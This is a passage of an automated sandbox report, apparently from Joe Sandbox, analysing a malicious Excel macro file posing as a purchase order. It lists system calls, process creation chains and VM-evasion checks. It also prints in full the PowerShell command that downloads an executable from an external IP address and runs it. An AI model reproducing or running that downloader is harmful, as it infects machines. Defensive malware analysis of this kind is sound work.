            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032E841F
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339CC77
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB477
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339D466
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394496
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009B8C90
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009B8C95
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009B2D90
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009B2D88
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009B2FB0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009CCFFA
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 03365720 appears 44 times
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 032DB150 appears 177 times
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0332D08C appears 45 times
            Source: C:\Users\Public\eVJOpc.exeCode function: String function: 0041A4B0 appears 40 times
            Source: C:\Users\Public\eVJOpc.exeCode function: String function: 00B4B150 appears 45 times
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004185D0 NtCreateFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00418680 NtReadFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00418700 NtClose,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004187B0 NtAllocateVirtualMemory,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004186FA NtClose,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004187AB NtAllocateVirtualMemory,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B898F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B899A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B895D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B896E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B897A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B898A0 NtWriteVirtualMemory,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89820 NtEnumerateKey,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8B040 NtSuspendThread,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B899D0 NtCreateProcessEx,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89950 NtQueueApcThread,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89A80 NtOpenDirectoryObject,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89A10 NtQuerySection,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8A3B0 NtGetContextThread,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89B00 NtSetValueKey,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B895F0 NtQueryInformationFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8AD30 NtSetContextThread,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89520 NtWaitForSingleObject,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89560 NtWriteFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B896D0 NtCreateKey,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89610 NtEnumerateValueKey,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89670 NtQueryInformationProcess,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89650 NtQueryValueKey,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89730 NtQueryVirtualMemory,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8A710 NtOpenProcessToken,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89770 NtSetInformationFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8A770 NtOpenThread,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89760 NtOpenProcess,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_004185D0 NtCreateFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00418680 NtReadFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00418700 NtClose,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_004187B0 NtAllocateVirtualMemory,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_004186FA NtClose,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_004187AB NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033196E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033195D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033199A0 NtCreateSection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033199D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319840 NtDelayExecution,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033198A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033198F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319710 NtQueryInformationToken,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033197A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319780 NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319650 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033196D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319560 NtWriteFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033195F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C85D0 NtCreateFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C8680 NtReadFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C87B0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C8700 NtClose,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C86FA NtClose,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C87AB NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeProcess Stats: CPU usage > 98%
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll C5D3FB8CC4B1BE9B9AABEEB14B7F4C12F3FCE5C8DFB0C1968C82D8B5C19B9245
            Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr codeName="ThisWorkbook"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Administrator\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><workbookProtection workbookAlgorithmName="SHA-512" workbookHashValue="g6J+U4jdDrb3WMKx8jWXEvB5PUnevNCnWu18PHNvGg3ndF21lKTVsvDW13wLgH7HS9vnHDRqP928qns3kCbkxA==" workbookSaltValue="p3a4TEPalWYAjtkycguiHw==" workbookSpinCount="100000" lockStructure="1"/><bookViews><workbookView xWindow="390" yWindow="390" windowWidth="21600" windowHeight="11385" firstSheet="1" activeTab="1"/></bookViews><sheets><sheet name="i0o86z" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet1" sheetId="1" r:id="rId2"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">i0o86z!$E$6</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
            Source: purchase Order.xlsmVirustotal: Detection: 22%
            Source: purchase Order.xlsmReversingLabs: Detection: 40%
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe
            Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
            Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Users\Public\eVJOpc.exeProcess created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Users\Public\eVJOpc.exeProcess created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Windows\SysWOW64\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{00931FDB-06EA-4BE4-B65D-68115E3B9413} - OProcSessId.datJump to behavior
            Source: qqxmvpxcvyt.dll.8.drBinary string: LanmanWorkstationLanmanServerc:\lanmanWorkgroupHOMEAdministrators\\Default-First-Site-NameNo commenthttp://https://SSL:%uhttphttps\DavWWWRoot@SSL80443AdministratorGuest_ldap._tcp.dc._msdcs.\Device\UnknownTransport_\Device\NetBT_Tcpip_LsaQueryInformationPolicy failed with NT status %x
            Source: qqxmvpxcvyt.dll.8.drBinary string: \Device\UnknownTransport_
            Source: qqxmvpxcvyt.dll.8.drBinary string: \Device\NetBT_Tcpip_
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@15/13@0/1
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00402053 CoCreateInstance,MultiByteToWideChar,
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_01
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: unknownProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: purchase Order.xlsmInitial sample: OLE zip file path = xl/media/image1.png
            Source: 47E20000.0.drInitial sample: OLE zip file path = xl/media/image1.png
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
            Source: Binary string: wntdll.pdbUGP source: eVJOpc.exe, 00000008.00000003.370323842.000000000F210000.00000004.00000001.sdmp, eVJOpc.exe, 00000009.00000002.452970458.0000000000B20000.00000040.00000001.sdmp, wlanext.exe, 00000013.00000002.564446547.00000000033CF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: eVJOpc.exe, wlanext.exe
            Source: Binary string: wlanext.pdb source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
            Source: Binary string: wlanext.pdbGCTL source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_079427DB push ebx; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0794DE80 push es; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_0041B87C push eax; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_0041B812 push eax; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_0041B81B push eax; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_0041C9B0 push dword ptr [E4BA1D0Dh]; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00418B85 pushfd ; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00415F20 push ebp; iretd
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_0041B7C5 push eax; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00B9D0D1 push ecx; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_0041B87C push eax; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_0041B812 push eax; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_0041B81B push eax; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_0041C9B0 push dword ptr [E4BA1D0Dh]; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_00418B85 pushfd ; ret
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_00415F20 push ebp; iretd
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_0041B7C5 push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0332D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_009CB81B push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_009CB812 push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_009CB87C push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_009CC9B0 push dword ptr [E4BA1D0Dh]; ret
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_009C8B85 pushfd ; ret
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_009CB7C5 push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_009C5F20 push ebp; iretd
            Source: C:\Users\Public\eVJOpc.exe | File created: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\eVJOpc.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\eVJOpc.exe

            Boot Survival:

            Drops PE files to the user root directory
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\eVJOpc.exe
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\eVJOpc.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\Public\eVJOpc.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\eVJOpc.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000009B8614 second address: 00000000009B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000009B89AE second address: 00000000009B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6860Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6360Thread sleep time: -30000s >= -30000s
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004088E0 rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2440
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00405E93 FindFirstFileA,FindClose,
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00402671 FindFirstFileA,
            Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
            Source: explorer.exe, 0000000A.00000000.405345542.000000000EF44000.00000004.00000001.sdmpBinary or memory string: 8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI.3
            Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
            Source: explorer.exe, 0000000A.00000000.424269138.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000002.560332764.000000000089A000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
